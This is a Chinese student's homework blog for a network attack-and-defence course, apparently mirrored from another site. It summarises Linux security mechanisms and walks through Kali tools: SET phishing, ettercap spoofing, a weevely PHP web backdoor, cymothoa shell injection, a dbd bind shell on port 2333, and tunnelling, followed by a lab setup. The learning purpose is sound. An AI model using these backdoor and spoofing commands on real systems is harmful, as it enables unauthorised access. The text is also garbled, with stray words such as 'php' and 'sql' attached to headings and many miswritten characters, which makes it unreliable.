2017-2018-2 20179215《網絡攻防實踐》第八週做業

《網絡攻防實踐》 第八週 學習總結

1、第八章教材內容總結

Linux 操做系統簡介

  1. Linux 系統特色:
  • 兼容UNIX :API 兼容,管理命令和各類工具:
  • 源碼開放
  • 支持各類硬件平臺,支持多CPU
  • Linux 平臺上存在大量的應用軟件,以及應
  • 用開發工具
  • 多種不一樣發行版: RedHat(RHEL,Fedora, CentOS, …),Ubuntu,Debian, …

2.Linux 操做系統:php

  • 不是微內核系統,但具備某些微內核特徵
  • Intel 版本:i386 的保護模式,特權級java

    • 內核態(0 )和用戶態(3 )
    • 中斷和系統調用—— 兩種特權級的切換
  • 多用戶,多任務,分時系統linux

    • 多用戶系統:能併發(concurrently) 和獨立(independently) 地執行分別屬於多個用戶的若干應用程序( 任務) 的計算機.

3.Linux的進程web

  • 搶佔式多處理(multiprocessing) 操做系統多進程併發活動,系統負責 調度硬件資源使用sql

  • PCB :進程控制塊,常駐內存shell

  • 進程是最基本的調度單元
    • 進程是動態的,每個進程都有一個進程控制塊
    • 沒有專門的調度進程,內核中有一個schedule 函數完成調度任務

4.Linux的系統調用編程

  • 編程接口,與POSIX 兼容,C 語言函數集合
  • 函數名」 sys_ xxx」
    • 好比系統調用fork 的相應函數sys_ fork()
  • 實現形式與DOS 的INT 21H 類似
    • Linux 2.6 內核以前使用int 80h
    • Linux 2.6 內核支持sysenter 機制
  • 系統調用號和系統調用表
  • 全部的系統調用只有一個入口 system_ call
  • 出口: ret_ from_ sys_ call

5.Linux的內存管理安全

  • 在i386 機器上,每一個進程有獨立的4G 虛存空間
  • 32位線性地址—— 利用硬件的分頁機制
  • 內核的代碼段和數據段被映射到3G 以上的空間中
  • 用戶態下的代碼實際可申請的虛存空間爲0-3GB
  • 每一個進程用兩套段描述符來訪問內存,分別用來訪問內核態和用
    戶態下的內存空間
  • 在用戶態下,代碼不可能訪問3G 以上的地址空間,若是要訪問內
    核空間,必須經過系統調用或者中斷
  • Linux 對虛存的管理使用vma(virtual memory area) 機制
  • 頁交換機制:缺頁中斷、頁面換入

6.Linux的文件系統bash

  • Linux 支持多種文件系統,包括ext 、ext2 、hpfs 、vfat 、
    ntfs 、…
    • 經過虛擬文件系統VFS ,Linux 操做系統能夠支持不一樣類型
      的文件系統
    • 經過虛擬文件系統中的設備文件訪問特定硬件設備
  • 文件系統類型管理
    • 文件系統類型的註冊途徑:
      • 在編譯內核時肯定
      • 在文件系統做爲模塊裝入時登記

7.Linux中網絡的層次結構網絡

Linux 的安全結構和機制

1.Linux操做系統安全機制核心

  • AAA 機制
    • 認證、受權與審計
  • Authentication
    • 身份認證:用戶管理與用戶身份認證
  • Authorization(Access Control)
    • 受權訪問,訪問控制:文件系統安全控制
  • Accountability
    • 行爲審計:系統日誌機制

2.Linux用戶身份認證

  • 本地用戶登陸認證:login
    crypt() 函數

  • 網絡服務登陸認證:telnet/rsh/ssh/…
    ssh 的公鑰非交互式遠程身份認證

  • 非Shell 程序的用戶認證
    • Apache: MD5 散列口令字(htpasswd 建立)
    • Samba: smbpasswd, LANMAN 或NTLM 散列口令字
    • MySQL: 存放於user 系統表, PASSWORD() 函數, 可以使用
      MD5 或SHA1 散列
  • Linux PAM: 用戶身份認證中間件

3.PAM(Pluggable Authentication Modules)

  • 一種可插入的認證機制
  • 針對一個服務,指定一些認證相關的動做,放到/etc/pam.conf 文件 中,或者放到/etc/pam.d/ 下與服務同名的配置文件中

  • 每一行包含一個模塊類型、一個控制級別、一個模塊:
    service module-type control-flag module [args]

4.Linux 文件系統安全性

  • 權限管理的不靈活
    • 只能對全部者、全部者所在組和其餘用戶分配權限,沒法作到進一步的細緻化
  • POSIX ACLs for Linux 軟件包
    • 內核補丁,能夠作到用ACL 來管理權限
    • 須要從新編譯內核,下載補丁: http://acl.bestbits.at
    • 兩個命令:setfacl 、getfacl
  • 真正刪除文件
    • 工具wipe

5.內核中的ROOTKIT

  • 經過LKM 機制,能夠在系統內核中插入木馬模塊
  • 一個典型的以Linux 2.2.x 爲基礎的rootkit—— knark
    • 使用insmod knark.o 就能夠加載到內核中
    • 一旦加載了knark 後門以後
      • 能夠改變netstat 的輸出結果
      • 能夠改變運行進程的UID 和GID
      • 能夠不用SUID 就可以得到root 訪問權限
      • ……
  • 還有其餘的ROOTKITS ,好比adore, adore-ng
  • 內核ROOTKITS 的對策
    • 根據每一個rootkit 的特徵進行檢測,而後設法刪除
    • 預防爲主,安裝內核檢測系統,好比LIDS

6.xinetd配置

7./etc/services 配置文件

8.使用xinetd 實施網絡訪問控制

  • 設置缺省的拒絕訪問
    • /etc/xinetd.conf 設置no_ access 屬性 no_ access = 0.0.0.0
    • only_ from =
  • 細粒度設置網絡訪問控制
  • xinetd.conf 的defaults 節或各個服務配置文
  • only_from = 容許訪問的IP 段、域名段
  • no_access = 拒絕訪問的IP 段、域名
  • 內核: netfilter
  • 應用層: ipfwadm -> ipchains -> iptables
  • Netfilter

九、Linux內核防火牆

  • 在框架中,定義了5 個鉤子位置
  • 在每一個鉤子上能夠掛接多個模塊
  • 過濾位置: LOCAL_ IN(INPUT) 、FORWARD 、LOCAL_ OUT(OUTPUT)
  • 提供多種功能
    • 包過濾防火牆
    • 地址轉換NAT
    • 網絡狀態檢測
    • ……

Linux系統遠程攻擊

  • 口令猜想
  • 攻擊Linux 網絡服務
    • 對網絡服務守護進程的數據驅動攻擊
    • 緩衝區溢出
    • 格式化字符串
    • 輸入驗證
    • 整數溢出
    • 默認或有害的配置
  • 攻擊Linux

2、kali視頻學習

31.KaliSecurity - 漏洞利用之SET

瞭解kali下漏洞利用工具中set工具的使用

Social Engineering Toolkit是一個開源工具,Python驅動的社會工程學滲透測試工具,提供了很是豐富的攻擊向量庫,是開源的社會工程學利用套件,一般結合Metasploit來使用。

1.打開終端:

2.輸入1回車進入社會工程學攻擊:

共有11個模塊,分別爲:

3.輸入1進入魚叉式釣魚攻擊:

此攻擊向量主要目的爲發送存在惡意軟件的釣魚郵件,相應的payload能夠選擇不一樣的漏洞(選項2):

4.返回主菜單,選2進入網站攻擊框架:

5.選擇3,進入介質感染攻擊:

藉助Autorun.inf執行Exploit獲得一個返回的shell,也能夠結合Metasploit的後門。

6.建立payload和監聽器:

7.選擇5 羣發郵件攻擊,支持導入列表並向列表中的每一個人發送郵件

八、基於Arduino

九、短信欺騙攻擊

十、無線接入點攻擊:無線接入點攻擊會建立一個虛擬無線AP,經過接入點ap能夠抓取全部鏈接進來的設備流量。

十一、二維碼攻擊:填入一個危險的URL,使得被攻擊者掃描二維碼自動訪問頁面中招

十二、PowerShell攻擊:針對Vista以上的PowerShell攻擊模塊

1三、Fast-Track攻擊模塊

32.KaliSecurity - 嗅探欺騙與中間人攻擊

瞭解kali下嗅探欺騙工具的使用,並完成中間人攻擊實驗,這裏介紹進行ARP欺騙、DNS欺騙和嗅探以及會話劫持的方法。

一、爲Kali設置開啓端口轉發

二、設置ssltrip

三、ettercap的準備

4.ettercap使用

打開圖形化界面:

選擇嗅探網卡 默認eth0:

打開ettercap,選擇sniff選項-unified sniffing-選擇網卡-hosts選項:先scan for hosts,等掃描完了選host list

五、Dsniff套裝介紹

六、會話劫持

七、圖片截獲

八、DNS欺騙

九、URL監控

十、下載軟件監控

33.KaliSecurity - 權限維持以後門

瞭解kali權限維持工具中後門的使用,權限維持包含Tunnel工具集、Web後門、系統後門三個子類。其中系統後門與Web後門統稱爲後門,都是爲滲透測試後,爲方便再次進入系統而留下的惡意程序。

1.weevely

生成一個php後門,weevely generate test ~/1.php, test爲密碼,在本地生成~/1.php,查看生成的後門:

後門上傳到web,使用weevely鏈接:

(1)複製後門

(2)查看目標機ip

(3)ssh鏈接

用ssh沒法鏈接到目標機

(4)nano 1.php 複製生成文件內容到其中

(5)使用命令weevely http://192.168.14.129/1.php test進行鏈接

生成後門

查看生成的後門

nano 2.php 複製生成文件內容到其中

上傳到網站後,使用webacoo鏈接:webacoo -t -u http://192.168.199.149/2.php

3.Cymothoa系統後門

枚舉/bin/bash進程pid

cymothoa -10500 -s -0 -y 2333(注入2333端口),若是成功,能夠鏈接2333端口返回一個shell

4.dbd,sdb:增強版的nc

監聽端:dbd -l -p 2333 -e /bin/bash -k password

攻擊端:dbd 127.0.0.1 2333 -k password

5.U3-Pwn:與Metasploit Payload結合使用的工具,菜單能夠單刀多針對移動光驅設備如光驅鏡像,u盤等。

6.Intersect

1.列出可使用的模塊

2.建立後門腳本

3.自動添加組件。生成一個shell

4.建立後門

5.執行後門

(1)輸入./1.py -b進行綁定

(2)使用nc命令進行鏈接

(3)執行成功,返回一個shell

34.KaliSecurity - 權限維持之Tunnel

瞭解kali權限維持中tunnel工具的使用,Tunnel工具集包含了一系列用於創建通訊隧道、代理的工具。

一、CryptCat:與dbd/sbd使用也相似。

二、DNS2TCP:

三、Iodine:與DNS2TCP相似

四、Miredo:Miredo是一個網絡工具,主要用於BSD和Linux的IPV6 Teredo隧道轉換,能夠轉換不支持IPV6的網絡鏈接IPV6,內核中須要有IPV6和TUN隧道支持。

五、Proxychains:

內網滲透測試常常會用到一款工具,如咱們使用Meterpreter開設一個Socks4a代理服務,經過修改/etc/prosychains.conf配置文件,加入代理,便可使其餘工具如sqlmap、namp直接使用代理掃描內網。

六、Proxytunnel

七、Ptunnel:藉助ICMP數據包創建隧道通訊

八、Pwant:內網下經過UDP通訊

九、sslh

10.stunnel

11.udptunnel

35.KaliSecurity - 逆向工程工具

瞭解kali下的逆向工程工具

一、Edb-Debugger

EDB(Evan's Debugger)是一個基於Qt4開發的二進制調試工具,主要是爲了跟OllyDbg工具看齊,經過插件體系能夠進行功能的擴充,當前只支持Linux。

二、Ollydbg

三、jad:java反編譯工具

四、Redare2

五、Recstudio2

六、Apktool

9.Flasm

10.Javasnoop

3、實驗:網絡攻防環境搭建與測試

一個基礎的網絡攻防實驗環境主要有以下部分構成:靶機、攻擊機、攻擊監測分析與防護平臺、網絡鏈接。

1.網絡鏈接

運行在VMware虛擬機軟件上操做系統的網絡鏈接方式有三種:

  • 橋接方式(Bridge):在橋接方式下,VMware模擬一個虛擬的網卡給客戶系統,主系統對於客戶系統來講至關因而一個橋接器。客戶系統好像是有本身的網卡同樣,本身直接連上網絡,也就是說客戶系統對於外部直接可見。

  • 網絡地址轉換方式(NAT):在這種方式下,客戶系統不能本身鏈接網絡,而必須經過主系統對全部進出網絡的客戶系統收發的數據包作地址轉換。在這種方式下,客戶系統對於外部不可見。

  • 主機方式(Host-Only):在這種方式下,主系統模擬一個虛擬的交換機,全部的客戶系統經過這個交換機進出網絡。在這種方式下,若是主系統是用公網IP鏈接Internet,那客戶系統只能用私有IP。可是若是咱們另外安裝一個系統經過橋接方式鏈接Internet(這時這個系統成爲一個橋接器),則咱們能夠設置這些客戶系統的IP爲公網IP,直接從這個虛擬的橋接器鏈接Internet。
    在本環境中網絡鏈接模式設置爲橋接模式,在這一模式中應注意攻擊機和靶機應處於同一網段。

2.環境搭建

攻擊機:Windows XP Attacker(Windows)

靶機:Metasploitable(linux),Win2kServer_SP0_target

安裝攻擊機:

(1)解壓WinXPattacker的rar鏡像到某一目錄

(2)文件 --> 打開,選擇你的解壓目錄,選擇相應vmx文件

(3)配置攻擊機虛擬機的硬件

查看攻擊機ip:

安裝靶機:

(1)解壓Win2kServer_SP0_target的rar鏡像到某一目錄

(2)文件 --> 打開,選擇你的解壓目錄,選擇相應vmx文件

(3)配置靶機虛擬機的硬件

查看靶機ip:

相關文章
相關標籤/搜索